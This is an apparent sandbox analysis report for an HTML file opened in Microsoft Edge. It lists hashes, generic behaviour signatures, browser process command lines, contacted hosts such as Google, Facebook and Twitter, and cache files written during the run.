| SHA256 | a6dacfd4b7d0b1c56c7adddb383bbcb04240fe4f9519235bc9f6e9785d1cc47c |
| SHA512 | 08e1a5ead9e0d8c0281c7d85112d176763ccab59d29537c1f37f36b4d3e8b12146d52e7e12b5bcdf7909641d3023206951a3e4979fed9b1c73389f946740e59b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 9fc77ec5ba98f1a9a1b26e84b5dfecb9 |
| SHA1 | e1d6b3113b8ee155a0cf07e9e615655878639289 |
| SHA256 | 4be96fdd90d83e762f82657dadf0b4f7affd26ca9e654c66c0d64444553e44e7 |
| SHA512 | c1ddc3131b76f134e91ace04c2b05408f468ae47a5910b83d08af3741fea77464afbec1ffbfa769e0652faaeb00ce4f5c0f7ddc56ff602600a4d26decc3bef97 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 361e8990701a9ab5756fab08a7a84004 |
| SHA1 | e3f7fc4b34c2abd8f6499b9b85e925f4df40f572 |
| SHA256 | f7c979e6788280345ca7a8c11bb053c8f1e4cc76420e8e30c9a2f1dc094a5d6b |
| SHA512 | eea21b30d31baa0177888a6f5529ec0c996975255587ff3449da916a9f08e70371d772af29e50f973146eb643e40573346cfa1e301a37464e343db82ada42d32 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | b7a225e474e99b2627ab8975dac734c1 |
| SHA1 | b0b69834467a3b31109a8ee083279d522ff2d73b |
| SHA256 | c60b2c6d1b7a4428d1ee1dfdfb996bcb0b68b4a18bc2c644117bbbd26c0081a9 |
| SHA512 | 7cb15aedf2bed120152e891faf844220dd39e778ccb3873978404d175a65abb4cc571909823d31b19b025953fe22267207e0e51d36034edc5d5f19a20486194c |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 54f649f4be3c4afdbe60f763450e62f4 |
| SHA1 | 0e2f0dfeb8fe02a6f5938f4ec4a088c69d9d0eca |
| SHA256 | b61e4a2b3e3f66edfd70e66f26d99065f433b21876f60fb92f2c210c0dc45cfa |
| SHA512 | 3cb210906b66cb904c9e863d3e7c232f1024aae1e77f49ded95d5dd10b6b0efcd275cf30777cbb3c3fe8ab7ca1bc4f2df38fb8d0c99ef87002ad8de3cdb86be2 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 8ca9b66629c323b9874dbe3f3343959d |
| SHA1 | aa210566faf2ceaffbd85d541266df10e93201cd |
| SHA256 | 28daa2e53acea4da5821ead2652023cdf50d55ffedb292b39aaa078f09056861 |
| SHA512 | b469124df3c4758b3391110010870c336d075622d8979515c8490cf833de67d7d1995c2dc129a0c1ea883453edb4b0535ac87784af0f2b15ca891a8af4e162ae |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | a8d1132952179ff4656db340c9fb702b |
| SHA1 | dceebd4be13ba4e597c39c237ac682e0fa7b52be |
| SHA256 | f0d0d78b08afdc402e85f1b010082e6925562966f10ced5e10d56f930d7396be |
| SHA512 | 4e2bd173cdb14e155cdc48a70004e610c9a00988d5abd555d0d6cef02dfa18a16b4569445c6ebddbcac6db5a12f661789d1a9f34ebc90b851f71a206e0a979ce |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K3VL8XEP\rpc_shindig_random[1].js
| MD5 | 70116351ebc507731f11cfb8653f69bf |
| SHA1 | 667d48cd3c244c41a84302056e5b14140045acd3 |
| SHA256 | e3fff060584ca9c8eb12a6925252c8c6333622f4e6aeae8417449bf0ae355020 |
| SHA512 | a69875a52b635e7a561cfe2c7f4639bc122be434989dd39b37ab8dda08b49aa4bfd681c572628e9dc056c69808d0a03e2c6b4fef88db20a59ca73f097870aee9 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IAE3FJ0M\2254111616-postmessagerelay[1].js
| MD5 | c264799bac4a96a4cd63eb09f0476a74 |
| SHA1 | d8a1077bf625dac9611a37bfb4e6c0cd07978f4c |
| SHA256 | 17dce4003e6a3d958bb8307bffa9c195694881f549943a7bdb2769b082f9326d |
| SHA512 | 6acd83dfd3db93f1f999d524b8828b64c8c0731567c3c0b8a77c6ddcf03d0e74ee20d23171e6ceac0c9f099dce03f8e5d68e78c374da2c055973f6ac2db4e4f9 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-29 04:40
Reported
2024-10-29 04:42
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Browser Information Discovery
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\7bcd5b3d743b791d182b9e223b10a6fc_JaffaCakes118.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8dd1246f8,0x7ff8dd124708,0x7ff8dd124718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,8448423550612482426,8115702849180068661,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2072,8448423550612482426,8115702849180068661,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2072,8448423550612482426,8115702849180068661,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2932 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8448423550612482426,8115702849180068661,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8448423550612482426,8115702849180068661,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8448423550612482426,8115702849180068661,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4756 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8448423550612482426,8115702849180068661,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4764 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8448423550612482426,8115702849180068661,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4716 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8448423550612482426,8115702849180068661,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5516 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8448423550612482426,8115702849180068661,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5532 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8448423550612482426,8115702849180068661,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5588 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8448423550612482426,8115702849180068661,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5792 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8448423550612482426,8115702849180068661,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6792 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2072,8448423550612482426,8115702849180068661,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7600 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2072,8448423550612482426,8115702849180068661,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7600 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8448423550612482426,8115702849180068661,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5656 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8448423550612482426,8115702849180068661,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8448423550612482426,8115702849180068661,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6848 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,8448423550612482426,8115702849180068661,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6756 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,8448423550612482426,8115702849180068661,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5960 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | blogmagsac.com | udp |
| US | 8.8.8.8:53 | ajax.googleapis.com | udp |
| GB | 142.250.178.10:80 | fonts.googleapis.com | tcp |
| GB | 142.250.180.10:80 | ajax.googleapis.com | tcp |
| GB | 142.250.180.10:80 | ajax.googleapis.com | tcp |
| US | 8.8.8.8:53 | www.linkwithin.com | udp |
| SG | 118.139.179.30:80 | www.linkwithin.com | tcp |
| SG | 118.139.179.30:80 | www.linkwithin.com | tcp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| US | 8.8.8.8:53 | pinit-cdn.pinterest.com | udp |
| GB | 163.70.151.35:80 | www.facebook.com | tcp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| US | 8.8.8.8:53 | platform.twitter.com | udp |
| GB | 163.70.151.35:443 | www.facebook.com | tcp |
| SG | 118.139.179.30:80 | www.linkwithin.com | tcp |
| GB | 146.75.72.157:443 | platform.twitter.com | tcp |
| GB | 142.250.200.46:443 | apis.google.com | tcp |
| GB | 142.250.200.34:80 | pagead2.googlesyndication.com | tcp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| GB | 142.250.200.46:443 | apis.google.com | udp |
| GB | 163.70.147.35:445 | www.facebook.com | tcp |
| US | 8.8.8.8:53 | developers.google.com | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| GB | 142.250.187.227:80 | fonts.gstatic.com | tcp |
| GB | 216.58.212.238:80 | developers.google.com | tcp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | syndication.twitter.com | udp |
| NL | 173.194.69.84:443 | accounts.google.com | tcp |
| GB | 172.217.16.226:443 | googleads.g.doubleclick.net | tcp |
| US | 104.244.42.136:443 | syndication.twitter.com | tcp |
| GB | 216.58.212.238:443 | developers.google.com | tcp |
| US | 8.8.8.8:53 | ssl.gstatic.com | udp |
| GB | 142.250.200.3:443 | ssl.gstatic.com | tcp |
| US | 8.8.8.8:53 | 35.151.70.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.179.139.118.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.72.75.146.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.42.244.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.69.194.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | twitter.com | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ep1.adtrafficquality.google | udp |
| GB | 142.250.200.2:443 | ep1.adtrafficquality.google | tcp |
| US | 8.8.8.8:53 | ep2.adtrafficquality.google | udp |
| GB | 216.58.213.1:443 | ep2.adtrafficquality.google | tcp |
| GB | 216.58.213.1:443 | ep2.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | 2.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.213.58.216.in-addr.arpa | udp |
| GB | 142.250.200.2:443 | ep1.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| NL | 173.194.69.84:443 | accounts.google.com | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 45.19.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
| NL | 173.194.69.84:443 | accounts.google.com | udp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | f426165d1e5f7df1b7a3758c306cd4ae |
| SHA1 | 59ef728fbbb5c4197600f61daec48556fec651c1 |
| SHA256 | b68dfc21866d0abe5c75d70acc54670421fa9b26baf98af852768676a901b841 |
| SHA512 | 8d437fcb85acb0705bf080141e7a021740901248985a76299ea8c43e46ad78fb88c738322cf302f6a550caa5e79d85b36827e9b329b1094521b17cf638c015b6 |
\??\pipe\LOCAL\crashpad_2908_TBNUYSWZVDEKXETW
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 6960857d16aadfa79d36df8ebbf0e423 |
| SHA1 | e1db43bd478274366621a8c6497e270d46c6ed4f |
| SHA256 | f40b812ce44e391423eb66602ac0af138a1e948aa8c4116045fef671ef21cd32 |
| SHA512 | 6deb2a63055a643759dd0ae125fb2f68ec04a443dbf8b066a812b42352bbcfa4517382ed0910c190c986a864559c3453c772e153ee2e9432fb2de2e1e49ca7fe |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 31829aa6d5e16d814585de9b866948cb |
| SHA1 | be0d43a11ebcc404b5c696ad1b15685b2735c414 |
| SHA256 | 872e115ca10c7721f81d804aba58e886de06cb9b580f798701bb1ccd6dab3598 |
| SHA512 | 3ac844ab7308396d6f3e83485df9b996139555fbab59e8954735544037777c5792bbb46570e985449c39fe9dcdd5bf94b926d20b604586b77755a106cd23e687 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | fa1ce75b72d0aa549040b75330663303 |
| SHA1 | 38e0ca1497953898e22734b4b4ee21d2d3dfb36f |
| SHA256 | 573cc77007da0ea0074c61bb3aa39857bae03210719034b4119cb218193ae923 |
| SHA512 | 6c8ff24c3978cc2fd4c47becdf8a5c6401c4074d8ce9a9236f3ee7939011d176044404d2e78725356618840e2e71767544fd653c6ae0c7858682b36f741fce91 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 7babcb8cbc2166527ae62b40fa48cd7e |
| SHA1 | dd311b23eac731dc44972f5c74f324cdb0cc97c7 |
| SHA256 | 729782bf392172eee0d9c7b4e283c2e1740347e7b26b11ecd4bb4f71ce87193e |
| SHA512 | 938aa585a3ef9f3dc411e151ab9cede60883287116f0c559a6a8cdd8876822996dc11b1cbf6aff6f8224b75c42b6c4b326d5694a40aaa04716eeb6c270ecac24 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 99992f273376a649ab4f2a71c799ac46 |
| SHA1 | 800f5fb1e103fbed08425a5d5bdd0380eab612e6 |
| SHA256 | 60d41e7a86652c995ffff84a502581d10d387b36805912b74c0ca5a5d23ff1cd |
| SHA512 | fbecb6341d12d9d7e246a26d89520201a5ac9702adf15874ed41418a843f9b46bc88d3d573c6ea0224ea028ae916fdbe4f0f66641a32f5fec10df1114d889f10 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 6f8343fb2eee40a7cced04cbf38fd9e5 |
| SHA1 | dcac2b526f3b9c58760f96536872a752a5d3bcd6 |
| SHA256 | ae5ac6f887464d3db88b2dca560c4b2bc01e59d1dfd85b958b19b173a358890f |
| SHA512 | 965ad818b292b24b6a9eca91f222d24a61693389422016c322e1bcc5b990ab96ee890e8f596277c9aff3e595c15767c8c9d9750a7cb29d8bb0edb223b4aeaad4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000009
| MD5 | 05197e9427acea2ac4dc812f97a8f078 |
| SHA1 | 3d2a38b79da52e57783360f195ac3e7c85edefd8 |
| SHA256 | 7bdfd36b4f017340dbc84a310014381bfd3028416ff21c54f7ce0a35cfd38191 |
| SHA512 | 084d4febc28358d3ba6b0bef400f637b7f350381b8b592b1e412dd860d5aaf034c03ecfa87a064cb19dd8a42faade23c260e35a8660791011b7e51b726418ead |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\70697f79-0d21-43df-88d9-f7dbe6f04168.tmp
| MD5 | 2288d36c2b75cd32eec718aa343c1e9e |
| SHA1 | 361c42c12a29ad2bee9810567e3af8564b1d42f0 |
| SHA256 | 07004fa76f7f52fcd64235f1463b2cafdcb512e3c85b774516d1f29d8f638f7d |
| SHA512 | 9544ad26b1bbea9882f45f07ecf36548cd0bf5af52cfad9b65a5c2c0478b4414ad797227fd82a24c582ad2634bf9ab2467b7d7bdf0c348689b5ce4bfa369700d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 36ef52665d5e42fee0fa158683e3f9b9 |
| SHA1 | c3daac4011c3f0d57a670c2fcb646cb2fe64ecf2 |
| SHA256 | 213fe884fc4181a9e2ecb2cc0e49c9c2fe0ab918015cf40bacc2eabfa1661bfd |
| SHA512 | 59d6ad5bbf684cbc93316526b97fa90d33eb84f7cb0e987b51a87fd12255ae328db8fa7a776d5fc3dec78ced1b3c2e11f1bd071110ea53249fe738a7ed7a764f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 6a2440f79d1d240fec25b91612f5d046 |
| SHA1 | 89c51804796378e7ab3a0132d51cbfaacfe343ba |
| SHA256 | be285334c1b375fc9841f5750fd7f89c19010984a74fe0a9e4aa4036410bc746 |
| SHA512 | dde97ea6feefbdc30e437a45410274a434cf9a657af8e89f9a63416515596c1afd494524834b8d68023576a2b454af52d1608f1a24705be45a55bd312110f02e |